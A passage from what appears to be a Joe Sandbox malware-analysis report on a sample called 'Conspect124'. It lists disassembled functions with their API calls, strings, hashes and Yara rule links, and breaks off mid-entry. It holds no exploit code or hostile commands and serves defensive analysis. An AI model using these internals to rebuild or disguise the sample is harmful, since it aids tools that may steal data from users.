                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf$wcscpy
                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                      • API String ID: 1283228442-2366825230
                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                      Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 00413972
                                      • wcscpy.MSVCRT ref: 00413982
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                      • wcscpy.MSVCRT ref: 004139D1
                                      • wcscat.MSVCRT ref: 004139DC
                                      • memset.MSVCRT ref: 004139B8
                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                      • memset.MSVCRT ref: 00413A00
                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                      • wcscat.MSVCRT ref: 00413A27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                      • String ID: \systemroot
                                      • API String ID: 4173585201-1821301763
                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                      Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy
                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                      • API String ID: 1284135714-318151290
                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                      Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                      • String ID: 0$6
                                      • API String ID: 4066108131-3849865405
                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                      Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 004082EF
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memset.MSVCRT ref: 00408362
                                      • memset.MSVCRT ref: 00408377
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 290601579-0
                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$wcslen
                                      • String ID:
                                      • API String ID: 3592753638-3916222277
                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040A47B
                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                      • wcslen.MSVCRT ref: 0040A4BA
                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                      • wcslen.MSVCRT ref: 0040A4E0
                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$_snwprintfmemset
                                      • String ID: %s (%s)$YV@
                                      • API String ID: 3979103747-598926743
                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                      • wcslen.MSVCRT ref: 0040A6B1
                                      • wcscpy.MSVCRT ref: 0040A6C1
                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                      • wcscpy.MSVCRT ref: 0040A6DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                      • String ID: Unknown Error$netmsg.dll
                                      • API String ID: 2767993716-572158859
                                      • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                      • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 0040DAFB
                                      • wcscpy.MSVCRT ref: 0040DB0B
                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 3176057301-2039793938
                                      • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                      • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                      • database is already attached, xrefs: 0042F721
                                      • database %s is already in use, xrefs: 0042F6C5
                                      • unable to open database: %s, xrefs: 0042F84E
                                      • too many attached databases - max %d, xrefs: 0042F64D
                                      • out of memory, xrefs: 0042F865
                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                      • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                      • String ID: ($d
                                      • API String ID: 1140211610-1915259565
                                      • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                      • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                      • GetLastError.KERNEL32 ref: 004178FB
                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockSleepUnlock
                                      • String ID:
                                      • API String ID: 3015003838-0
                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                      Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                      • GetLastError.KERNEL32 ref: 0041855C
                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                      • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                      • GetLastError.KERNEL32 ref: 0041858E
                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                      • free.MSVCRT ref: 004185AC
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$AttributesDeleteErrorLastSleep$free
                                      • String ID:
                                      • API String ID: 2802642348-0
                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                      • memset.MSVCRT ref: 00413ADC
                                      • memset.MSVCRT ref: 00413AEC
                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                      • memset.MSVCRT ref: 00413BD7
                                      • wcscpy.MSVCRT ref: 00413BF8
                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                      • String ID: 3A
                                      • API String ID: 3300951397-293699754
                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                      • wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                      • wcslen.MSVCRT ref: 0040D1D3
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                      • String ID: strings
                                      • API String ID: 3166385802-3030018805
                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00411AF6
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 00411B14
                                      • wcscat.MSVCRT ref: 00411B2E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
